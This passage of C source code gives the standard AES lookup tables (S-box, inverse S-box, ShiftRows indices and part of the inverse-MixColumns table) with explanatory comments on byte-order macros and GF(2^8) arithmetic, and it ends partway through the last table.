# define PUTU32(ct, st) { (ct)[0] = (u8)((st) >> 24); (ct)[1] = (u8)((st) >> 16); (ct)[2] = (u8)((st) >> 8); (ct)[3] = (u8)(st); }
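
/*
 * Illustrative note (not part of the original source): GETU32/PUTU32 read
 * and write 32-bit words in big-endian byte order regardless of host
 * endianness, e.g.
 *
 *     uint8_t b[4] = { 0x01, 0x02, 0x03, 0x04 };
 *     GETU32(b)               == 0x01020304U
 *     PUTU32(b, 0xAABBCCDDU);    // b becomes { 0xAA, 0xBB, 0xCC, 0xDD }
 */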
const uint8_t AES_sbox[256] = {
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
};
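
/*
 * Added commentary (not in the original file). AES_sbox is the Rijndael
 * S-box, S(x) = affine transform of the multiplicative inverse of x in
 * GF(2^8), and AES_isbox below is its inverse permutation; the classic
 * FIPS-197 check value is AES_sbox[0x53] == 0xED and AES_isbox[0xED] == 0x53.
 * The inverse-MixColumns table (AES_imc, further down) is built from GF(2^8)
 * products. A minimal sketch of the arithmetic, with hypothetical helper
 * names and the AES reduction polynomial x^8+x^4+x^3+x+1 (0x11B):
 *
 *     static uint8_t xtime(uint8_t a)              // multiply by x (i.e. 2)
 *     {
 *         return (a << 1) ^ ((a & 0x80) ? 0x1B : 0);
 *     }
 *     static uint8_t gf_mul(uint8_t a, uint8_t b)  // product mod 0x11B
 *     {
 *         uint8_t r = 0;
 *         while (b) {
 *             if (b & 1) r ^= a;
 *             a = xtime(a);
 *             b >>= 1;
 *         }
 *         return r;
 *     }
 *
 * With these, AES_imc[x][0] == (gf_mul(x,0x0e) << 24) | (gf_mul(x,0x09) << 16)
 * | (gf_mul(x,0x0d) << 8) | gf_mul(x,0x0b), matching the comment above that
 * table; the other three columns are byte rotations of the first.
 */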
const uint8_t AES_isbox[256] = {
    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,
    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,
    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,
    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,
};

const uint8_t AES_shifts[16] = {
    0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11
};

const uint8_t AES_ishifts[16] = {
    0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3
};

/* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */
/* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */
/* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */
/* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */
const uint32_t AES_imc[256][4] = {
    { 0x00000000, 0x00000000, 0x00000000, 0x00000000, }, /* x=00 */
    { 0x0E090D0B, 0x0B0E090D, 0x0D0B0E09, 0x090D0B0E, }, /* x=01 */
    { 0x1C121A16, 0x161C121A, 0x1A161C12, 0x121A161C, }, /* x=02 */
    { 0x121B171D, 0x1D121B17, 0x171D121B, 0x1B171D12, }, /* x=03 */
    { 0x3824342C, 0x2C382434, 0x342C3824, 0x24342C38, }, /* x=04 */
    { 0x362D3927, 0x27362D39, 0x3927362D, 0x2D392736, }, /* x=05 */
    { 0x24362E3A, 0x3A24362E, 0x2E3A2436, 0x362E3A24, }, /* x=06 */
    { 0x2A3F2331, 0x312A3F23, 0x23312A3F, 0x3F23312A, }, /* x=07 */
    { 0x70486858, 0x58704868, 0x68587048, 0x48685870, }, /* x=08 */
    { 0x7E416553, 0x537E4165, 0x65537E41, 0x4165537E, }, /* x=09 */
    { 0x6C5A724E, 0x4E6C5A72, 0x724E6C5A, 0x5A724E6C, }, /* x=0A */
    { 0x62537F45, 0x4562537F, 0x7F456253, 0x537F4562, }, /* x=0B */
    { 0x486C5C74, 0x74486C5C, 0x5C74486C, 0x6C5C7448, }, /* x=0C */
    { 0x4665517F, 0x7F466551, 0x517F4665, 0x65517F46, }, /* x=0D */
    { 0x547E4662, 0x62547E46, 0x4662547E, 0x7E466254, }, /* x=0E */
    { 0x5A774B69, 0x695A774B, 0x4B695A77, 0x774B695A, }, /* x=0F */
    { 0xE090D0B0, 0xB0E090D0, 0xD0B0E090, 0x90D0B0E0, }, /* x=10 */
    { 0xEE99DDBB, 0xBBEE99DD, 0xDDBBEE99, 0x99DDBBEE, }, /* x=11 */
    { 0xFC82CAA6, 0xA6FC82CA, 0xCAA6FC82, 0x82CAA6FC, }, /* x=12 */
    { 0xF28BC7AD, 0xADF28BC7, 0xC7ADF28B, 0x8BC7ADF2, }, /* x=13 */
    { 0xD8B4E49C, 0x9CD8B4E4, 0xE49CD8B4, 0xB4E49CD8, }, /* x=14 */
    { 0xD6BDE997, 0x97D6BDE9, 0xE997D6BD, 0xBDE997D6, }, /* x=15 */
    { 0xC4A6FE8A, 0x8AC4A6FE, 0xFE8AC4A6, 0xA6FE8AC4, }, /* x=16 */
    { 0xCAAFF381, 0x81CAAFF3, 0xF381CAAF, 0xAFF381CA, }, /* x=17 */
    { 0x90D8B8E8, 0xE890D8B8, 0xB8E890D8, 0xD8B8E890, }, /* x=18 */
    { 0x9ED1B5E3, 0xE39ED1B5, 0xB5E39ED1, 0xD1B5E39E, }, /* x=19 */
    { 0x8CCAA2FE, 0xFE8CCAA2, 0xA2FE8CCA, 0xCAA2FE8C, }, /* x=1A */
    { 0x82C3AFF5, 0xF582C3AF, 0xAFF582C3, 0xC3AFF582, }, /* x=1B */
    { 0xA8FC8CC4, 0xC4A8FC8C, 0x8CC4A8FC, 0xFC8CC4A8, }, /* x=1C */
    { 0xA6F581CF, 0xCFA6F581, 0x81CFA6F5, 0xF581CFA6, }, /* x=1D */
    { 0xB4EE96D2, 0xD2B4EE96, 0x96D2B4EE, 0xEE96D2B4, }, /* x=1E */
    { 0xBAE79BD9, 0xD9BAE79B, 0x9BD9BAE7, 0xE79BD9BA, }, /* x=1F */
    { 0xDB3BBB7B, 0x7BDB3BBB, 0xBB7BDB3B, 0x3BBB7BDB, }, /* x=20 */
    { 0xD532B670, 0x70D532B6, 0xB670D532, 0x32B670D5, }, /* x=21 */
    { 0xC729A16D, 0x6DC729A1, 0xA16DC729, 0x29A16DC7, }, /* x=22 */
    { 0xC920AC66, 0x66C920AC, 0xAC66C920, 0x20AC66C9, }, /* x=23 */
    { 0xE31F8F57, 0x57E31F8F, 0x8F57E31F, 0x1F8F57E3, }, /* x=24 */
    { 0xED16825C, 0x5CED1682, 0x825CED16, 0x16825CED, }, /* x=25 */
    { 0xFF0D9541, 0x41FF0D95, 0x9541FF0D, 0x0D9541FF, }, /* x=26 */
    { 0xF104984A, 0x4AF10498, 0x984AF104, 0x04984AF1, }, /* x=27 */
    { 0xAB73D323, 0x23AB73D3, 0xD323AB73, 0x73D323AB, }, /* x=28 */
    { 0xA57ADE28, 0x28A57ADE,
0xDE28A57A, 0x7ADE28A5, }, /* x=29 */ { 0xB761C935, 0x35B761C9, 0xC935B761, 0x61C935B7, }, /* x=2A */ { 0xB968C43E, 0x3EB968C4, 0xC43EB968, 0x68C43EB9, }, /* x=2B */ { 0x9357E70F, 0x0F9357E7, 0xE70F9357, 0x57E70F93, }, /* x=2C */ { 0x9D5EEA04, 0x049D5EEA, 0xEA049D5E, 0x5EEA049D, }, /* x=2D */ { 0x8F45FD19, 0x198F45FD, 0xFD198F45, 0x45FD198F, }, /* x=2E */ { 0x814CF012, 0x12814CF0, 0xF012814C, 0x4CF01281, }, /* x=2F */ { 0x3BAB6BCB, 0xCB3BAB6B, 0x6BCB3BAB, 0xAB6BCB3B, }, /* x=30 */ { 0x35A266C0, 0xC035A266, 0x66C035A2, 0xA266C035, }, /* x=31 */ { 0x27B971DD, 0xDD27B971, 0x71DD27B9, 0xB971DD27, }, /* x=32 */ { 0x29B07CD6, 0xD629B07C, 0x7CD629B0, 0xB07CD629, }, /* x=33 */ { 0x038F5FE7, 0xE7038F5F, 0x5FE7038F, 0x8F5FE703, }, /* x=34 */ { 0x0D8652EC, 0xEC0D8652, 0x52EC0D86, 0x8652EC0D, }, /* x=35 */ { 0x1F9D45F1, 0xF11F9D45, 0x45F11F9D, 0x9D45F11F, }, /* x=36 */ { 0x119448FA, 0xFA119448, 0x48FA1194, 0x9448FA11, }, /* x=37 */ { 0x4BE30393, 0x934BE303, 0x03934BE3, 0xE303934B, }, /* x=38 */ { 0x45EA0E98, 0x9845EA0E, 0x0E9845EA, 0xEA0E9845, }, /* x=39 */ { 0x57F11985, 0x8557F119, 0x198557F1, 0xF1198557, }, /* x=3A */ { 0x59F8148E, 0x8E59F814, 0x148E59F8, 0xF8148E59, }, /* x=3B */ { 0x73C737BF, 0xBF73C737, 0x37BF73C7, 0xC737BF73, }, /* x=3C */ { 0x7DCE3AB4, 0xB47DCE3A, 0x3AB47DCE, 0xCE3AB47D, }, /* x=3D */ { 0x6FD52DA9, 0xA96FD52D, 0x2DA96FD5, 0xD52DA96F, }, /* x=3E */ { 0x61DC20A2, 0xA261DC20, 0x20A261DC, 0xDC20A261, }, /* x=3F */ { 0xAD766DF6, 0xF6AD766D, 0x6DF6AD76, 0x766DF6AD, }, /* x=40 */ { 0xA37F60FD, 0xFDA37F60, 0x60FDA37F, 0x7F60FDA3, }, /* x=41 */ { 0xB16477E0, 0xE0B16477, 0x77E0B164, 0x6477E0B1, }, /* x=42 */ { 0xBF6D7AEB, 0xEBBF6D7A, 0x7AEBBF6D, 0x6D7AEBBF, }, /* x=43 */ { 0x955259DA, 0xDA955259, 0x59DA9552, 0x5259DA95, }, /* x=44 */ { 0x9B5B54D1, 0xD19B5B54, 0x54D19B5B, 0x5B54D19B, }, /* x=45 */ { 0x894043CC, 0xCC894043, 0x43CC8940, 0x4043CC89, }, /* x=46 */ { 0x87494EC7, 0xC787494E, 0x4EC78749, 0x494EC787, }, /* x=47 */ { 0xDD3E05AE, 0xAEDD3E05, 0x05AEDD3E, 0x3E05AEDD, }, /* x=48 */ { 0xD33708A5, 0xA5D33708, 0x08A5D337, 0x3708A5D3, }, /* x=49 */ { 0xC12C1FB8, 0xB8C12C1F, 0x1FB8C12C, 0x2C1FB8C1, }, /* x=4A */ { 0xCF2512B3, 0xB3CF2512, 0x12B3CF25, 0x2512B3CF, }, /* x=4B */ { 0xE51A3182, 0x82E51A31, 0x3182E51A, 0x1A3182E5, }, /* x=4C */ { 0xEB133C89, 0x89EB133C, 0x3C89EB13, 0x133C89EB, }, /* x=4D */ { 0xF9082B94, 0x94F9082B, 0x2B94F908, 0x082B94F9, }, /* x=4E */ { 0xF701269F, 0x9FF70126, 0x269FF701, 0x01269FF7, }, /* x=4F */ { 0x4DE6BD46, 0x464DE6BD, 0xBD464DE6, 0xE6BD464D, }, /* x=50 */ { 0x43EFB04D, 0x4D43EFB0, 0xB04D43EF, 0xEFB04D43, }, /* x=51 */ { 0x51F4A750, 0x5051F4A7, 0xA75051F4, 0xF4A75051, }, /* x=52 */ { 0x5FFDAA5B, 0x5B5FFDAA, 0xAA5B5FFD, 0xFDAA5B5F, }, /* x=53 */ { 0x75C2896A, 0x6A75C289, 0x896A75C2, 0xC2896A75, }, /* x=54 */ { 0x7BCB8461, 0x617BCB84, 0x84617BCB, 0xCB84617B, }, /* x=55 */ { 0x69D0937C, 0x7C69D093, 0x937C69D0, 0xD0937C69, }, /* x=56 */ { 0x67D99E77, 0x7767D99E, 0x9E7767D9, 0xD99E7767, }, /* x=57 */ { 0x3DAED51E, 0x1E3DAED5, 0xD51E3DAE, 0xAED51E3D, }, /* x=58 */ { 0x33A7D815, 0x1533A7D8, 0xD81533A7, 0xA7D81533, }, /* x=59 */ { 0x21BCCF08, 0x0821BCCF, 0xCF0821BC, 0xBCCF0821, }, /* x=5A */ { 0x2FB5C203, 0x032FB5C2, 0xC2032FB5, 0xB5C2032F, }, /* x=5B */ { 0x058AE132, 0x32058AE1, 0xE132058A, 0x8AE13205, }, /* x=5C */ { 0x0B83EC39, 0x390B83EC, 0xEC390B83, 0x83EC390B, }, /* x=5D */ { 0x1998FB24, 0x241998FB, 0xFB241998, 0x98FB2419, }, /* x=5E */ { 0x1791F62F, 0x2F1791F6, 0xF62F1791, 0x91F62F17, }, /* x=5F */ { 0x764DD68D, 0x8D764DD6, 0xD68D764D, 0x4DD68D76, }, /* x=60 
*/ { 0x7844DB86, 0x867844DB, 0xDB867844, 0x44DB8678, }, /* x=61 */ { 0x6A5FCC9B, 0x9B6A5FCC, 0xCC9B6A5F, 0x5FCC9B6A, }, /* x=62 */ { 0x6456C190, 0x906456C1, 0xC1906456, 0x56C19064, }, /* x=63 */ { 0x4E69E2A1, 0xA14E69E2, 0xE2A14E69, 0x69E2A14E, }, /* x=64 */ { 0x4060EFAA, 0xAA4060EF, 0xEFAA4060, 0x60EFAA40, }, /* x=65 */ { 0x527BF8B7, 0xB7527BF8, 0xF8B7527B, 0x7BF8B752, }, /* x=66 */ { 0x5C72F5BC, 0xBC5C72F5, 0xF5BC5C72, 0x72F5BC5C, }, /* x=67 */ { 0x0605BED5, 0xD50605BE, 0xBED50605, 0x05BED506, }, /* x=68 */ { 0x080CB3DE, 0xDE080CB3, 0xB3DE080C, 0x0CB3DE08, }, /* x=69 */ { 0x1A17A4C3, 0xC31A17A4, 0xA4C31A17, 0x17A4C31A, }, /* x=6A */ { 0x141EA9C8, 0xC8141EA9, 0xA9C8141E, 0x1EA9C814, }, /* x=6B */ { 0x3E218AF9, 0xF93E218A, 0x8AF93E21, 0x218AF93E, }, /* x=6C */ { 0x302887F2, 0xF2302887, 0x87F23028, 0x2887F230, }, /* x=6D */ { 0x223390EF, 0xEF223390, 0x90EF2233, 0x3390EF22, }, /* x=6E */ { 0x2C3A9DE4, 0xE42C3A9D, 0x9DE42C3A, 0x3A9DE42C, }, /* x=6F */ { 0x96DD063D, 0x3D96DD06, 0x063D96DD, 0xDD063D96, }, /* x=70 */ { 0x98D40B36, 0x3698D40B, 0x0B3698D4, 0xD40B3698, }, /* x=71 */ { 0x8ACF1C2B, 0x2B8ACF1C, 0x1C2B8ACF, 0xCF1C2B8A, }, /* x=72 */ { 0x84C61120, 0x2084C611, 0x112084C6, 0xC6112084, }, /* x=73 */ { 0xAEF93211, 0x11AEF932, 0x3211AEF9, 0xF93211AE, }, /* x=74 */ { 0xA0F03F1A, 0x1AA0F03F, 0x3F1AA0F0, 0xF03F1AA0, }, /* x=75 */ { 0xB2EB2807, 0x07B2EB28, 0x2807B2EB, 0xEB2807B2, }, /* x=76 */ { 0xBCE2250C, 0x0CBCE225, 0x250CBCE2, 0xE2250CBC, }, /* x=77 */ { 0xE6956E65, 0x65E6956E, 0x6E65E695, 0x956E65E6, }, /* x=78 */ { 0xE89C636E, 0x6EE89C63, 0x636EE89C, 0x9C636EE8, }, /* x=79 */ { 0xFA877473, 0x73FA8774, 0x7473FA87, 0x877473FA, }, /* x=7A */ { 0xF48E7978, 0x78F48E79, 0x7978F48E, 0x8E7978F4, }, /* x=7B */ { 0xDEB15A49, 0x49DEB15A, 0x5A49DEB1, 0xB15A49DE, }, /* x=7C */ { 0xD0B85742, 0x42D0B857, 0x5742D0B8, 0xB85742D0, }, /* x=7D */ { 0xC2A3405F, 0x5FC2A340, 0x405FC2A3, 0xA3405FC2, }, /* x=7E */ { 0xCCAA4D54, 0x54CCAA4D, 0x4D54CCAA, 0xAA4D54CC, }, /* x=7F */ { 0x41ECDAF7, 0xF741ECDA, 0xDAF741EC, 0xECDAF741, }, /* x=80 */ { 0x4FE5D7FC, 0xFC4FE5D7, 0xD7FC4FE5, 0xE5D7FC4F, }, /* x=81 */ { 0x5DFEC0E1, 0xE15DFEC0, 0xC0E15DFE, 0xFEC0E15D, }, /* x=82 */ { 0x53F7CDEA, 0xEA53F7CD, 0xCDEA53F7, 0xF7CDEA53, }, /* x=83 */ { 0x79C8EEDB, 0xDB79C8EE, 0xEEDB79C8, 0xC8EEDB79, }, /* x=84 */ { 0x77C1E3D0, 0xD077C1E3, 0xE3D077C1, 0xC1E3D077, }, /* x=85 */ { 0x65DAF4CD, 0xCD65DAF4, 0xF4CD65DA, 0xDAF4CD65, }, /* x=86 */ { 0x6BD3F9C6, 0xC66BD3F9, 0xF9C66BD3, 0xD3F9C66B, }, /* x=87 */ { 0x31A4B2AF, 0xAF31A4B2, 0xB2AF31A4, 0xA4B2AF31, }, /* x=88 */ { 0x3FADBFA4, 0xA43FADBF, 0xBFA43FAD, 0xADBFA43F, }, /* x=89 */ { 0x2DB6A8B9, 0xB92DB6A8, 0xA8B92DB6, 0xB6A8B92D, }, /* x=8A */ { 0x23BFA5B2, 0xB223BFA5, 0xA5B223BF, 0xBFA5B223, }, /* x=8B */ { 0x09808683, 0x83098086, 0x86830980, 0x80868309, }, /* x=8C */ { 0x07898B88, 0x8807898B, 0x8B880789, 0x898B8807, }, /* x=8D */ { 0x15929C95, 0x9515929C, 0x9C951592, 0x929C9515, }, /* x=8E */ { 0x1B9B919E, 0x9E1B9B91, 0x919E1B9B, 0x9B919E1B, }, /* x=8F */ { 0xA17C0A47, 0x47A17C0A, 0x0A47A17C, 0x7C0A47A1, }, /* x=90 */ { 0xAF75074C, 0x4CAF7507, 0x074CAF75, 0x75074CAF, }, /* x=91 */ { 0xBD6E1051, 0x51BD6E10, 0x1051BD6E, 0x6E1051BD, }, /* x=92 */ { 0xB3671D5A, 0x5AB3671D, 0x1D5AB367, 0x671D5AB3, }, /* x=93 */ { 0x99583E6B, 0x6B99583E, 0x3E6B9958, 0x583E6B99, }, /* x=94 */ { 0x97513360, 0x60975133, 0x33609751, 0x51336097, }, /* x=95 */ { 0x854A247D, 0x7D854A24, 0x247D854A, 0x4A247D85, }, /* x=96 */ { 0x8B432976, 0x768B4329, 0x29768B43, 0x4329768B, }, /* x=97 */ { 0xD134621F, 0x1FD13462, 
0x621FD134, 0x34621FD1, }, /* x=98 */ { 0xDF3D6F14, 0x14DF3D6F, 0x6F14DF3D, 0x3D6F14DF, }, /* x=99 */ { 0xCD267809, 0x09CD2678, 0x7809CD26, 0x267809CD, }, /* x=9A */ { 0xC32F7502, 0x02C32F75, 0x7502C32F, 0x2F7502C3, }, /* x=9B */ { 0xE9105633, 0x33E91056, 0x5633E910, 0x105633E9, }, /* x=9C */ { 0xE7195B38, 0x38E7195B, 0x5B38E719, 0x195B38E7, }, /* x=9D */ { 0xF5024C25, 0x25F5024C, 0x4C25F502, 0x024C25F5, }, /* x=9E */ { 0xFB0B412E, 0x2EFB0B41, 0x412EFB0B, 0x0B412EFB, }, /* x=9F */ { 0x9AD7618C, 0x8C9AD761, 0x618C9AD7, 0xD7618C9A, }, /* x=A0 */ { 0x94DE6C87, 0x8794DE6C, 0x6C8794DE, 0xDE6C8794, }, /* x=A1 */ { 0x86C57B9A, 0x9A86C57B, 0x7B9A86C5, 0xC57B9A86, }, /* x=A2 */ { 0x88CC7691, 0x9188CC76, 0x769188CC, 0xCC769188, }, /* x=A3 */ { 0xA2F355A0, 0xA0A2F355, 0x55A0A2F3, 0xF355A0A2, }, /* x=A4 */ { 0xACFA58AB, 0xABACFA58, 0x58ABACFA, 0xFA58ABAC, }, /* x=A5 */ { 0xBEE14FB6, 0xB6BEE14F, 0x4FB6BEE1, 0xE14FB6BE, }, /* x=A6 */ { 0xB0E842BD, 0xBDB0E842, 0x42BDB0E8, 0xE842BDB0, }, /* x=A7 */ { 0xEA9F09D4, 0xD4EA9F09, 0x09D4EA9F, 0x9F09D4EA, }, /* x=A8 */ { 0xE49604DF, 0xDFE49604, 0x04DFE496, 0x9604DFE4, }, /* x=A9 */ { 0xF68D13C2, 0xC2F68D13, 0x13C2F68D, 0x8D13C2F6, }, /* x=AA */ { 0xF8841EC9, 0xC9F8841E, 0x1EC9F884, 0x841EC9F8, }, /* x=AB */ { 0xD2BB3DF8, 0xF8D2BB3D, 0x3DF8D2BB, 0xBB3DF8D2, }, /* x=AC */ { 0xDCB230F3, 0xF3DCB230, 0x30F3DCB2, 0xB230F3DC, }, /* x=AD */ { 0xCEA927EE, 0xEECEA927, 0x27EECEA9, 0xA927EECE, }, /* x=AE */ { 0xC0A02AE5, 0xE5C0A02A, 0x2AE5C0A0, 0xA02AE5C0, }, /* x=AF */ { 0x7A47B13C, 0x3C7A47B1, 0xB13C7A47, 0x47B13C7A, }, /* x=B0 */ { 0x744EBC37, 0x37744EBC, 0xBC37744E, 0x4EBC3774, }, /* x=B1 */ { 0x6655AB2A, 0x2A6655AB, 0xAB2A6655, 0x55AB2A66, }, /* x=B2 */ { 0x685CA621, 0x21685CA6, 0xA621685C, 0x5CA62168, }, /* x=B3 */ { 0x42638510, 0x10426385, 0x85104263, 0x63851042, }, /* x=B4 */ { 0x4C6A881B, 0x1B4C6A88, 0x881B4C6A, 0x6A881B4C, }, /* x=B5 */ { 0x5E719F06, 0x065E719F, 0x9F065E71, 0x719F065E, }, /* x=B6 */ { 0x5078920D, 0x0D507892, 0x920D5078, 0x78920D50, }, /* x=B7 */ { 0x0A0FD964, 0x640A0FD9, 0xD9640A0F, 0x0FD9640A, }, /* x=B8 */ { 0x0406D46F, 0x6F0406D4, 0xD46F0406, 0x06D46F04, }, /* x=B9 */ { 0x161DC372, 0x72161DC3, 0xC372161D, 0x1DC37216, }, /* x=BA */ { 0x1814CE79, 0x791814CE, 0xCE791814, 0x14CE7918, }, /* x=BB */ { 0x322BED48, 0x48322BED, 0xED48322B, 0x2BED4832, }, /* x=BC */ { 0x3C22E043, 0x433C22E0, 0xE0433C22, 0x22E0433C, }, /* x=BD */ { 0x2E39F75E, 0x5E2E39F7, 0xF75E2E39, 0x39F75E2E, }, /* x=BE */ { 0x2030FA55, 0x552030FA, 0xFA552030, 0x30FA5520, }, /* x=BF */ { 0xEC9AB701, 0x01EC9AB7, 0xB701EC9A, 0x9AB701EC, }, /* x=C0 */ { 0xE293BA0A, 0x0AE293BA, 0xBA0AE293, 0x93BA0AE2, }, /* x=C1 */ { 0xF088AD17, 0x17F088AD, 0xAD17F088, 0x88AD17F0, }, /* x=C2 */ { 0xFE81A01C, 0x1CFE81A0, 0xA01CFE81, 0x81A01CFE, }, /* x=C3 */ { 0xD4BE832D, 0x2DD4BE83, 0x832DD4BE, 0xBE832DD4, }, /* x=C4 */ { 0xDAB78E26, 0x26DAB78E, 0x8E26DAB7, 0xB78E26DA, }, /* x=C5 */ { 0xC8AC993B, 0x3BC8AC99, 0x993BC8AC, 0xAC993BC8, }, /* x=C6 */ { 0xC6A59430, 0x30C6A594, 0x9430C6A5, 0xA59430C6, }, /* x=C7 */ { 0x9CD2DF59, 0x599CD2DF, 0xDF599CD2, 0xD2DF599C, }, /* x=C8 */ { 0x92DBD252, 0x5292DBD2, 0xD25292DB, 0xDBD25292, }, /* x=C9 */ { 0x80C0C54F, 0x4F80C0C5, 0xC54F80C0, 0xC0C54F80, }, /* x=CA */ { 0x8EC9C844, 0x448EC9C8, 0xC8448EC9, 0xC9C8448E, }, /* x=CB */ { 0xA4F6EB75, 0x75A4F6EB, 0xEB75A4F6, 0xF6EB75A4, }, /* x=CC */ { 0xAAFFE67E, 0x7EAAFFE6, 0xE67EAAFF, 0xFFE67EAA, }, /* x=CD */ { 0xB8E4F163, 0x63B8E4F1, 0xF163B8E4, 0xE4F163B8, }, /* x=CE */ { 0xB6EDFC68, 0x68B6EDFC, 0xFC68B6ED, 0xEDFC68B6, }, /* x=CF 
*/ { 0x0C0A67B1, 0xB10C0A67, 0x67B10C0A, 0x0A67B10C, }, /* x=D0 */ { 0x02036ABA, 0xBA02036A, 0x6ABA0203, 0x036ABA02, }, /* x=D1 */ { 0x10187DA7, 0xA710187D, 0x7DA71018, 0x187DA710, }, /* x=D2 */ { 0x1E1170AC, 0xAC1E1170, 0x70AC1E11, 0x1170AC1E, }, /* x=D3 */ { 0x342E539D, 0x9D342E53, 0x539D342E, 0x2E539D34, }, /* x=D4 */ { 0x3A275E96, 0x963A275E, 0x5E963A27, 0x275E963A, }, /* x=D5 */ { 0x283C498B, 0x8B283C49, 0x498B283C, 0x3C498B28, }, /* x=D6 */ { 0x26354480, 0x80263544, 0x44802635, 0x35448026, }, /* x=D7 */ { 0x7C420FE9, 0xE97C420F, 0x0FE97C42, 0x420FE97C, }, /* x=D8 */ { 0x724B02E2, 0xE2724B02, 0x02E2724B, 0x4B02E272, }, /* x=D9 */ { 0x605015FF, 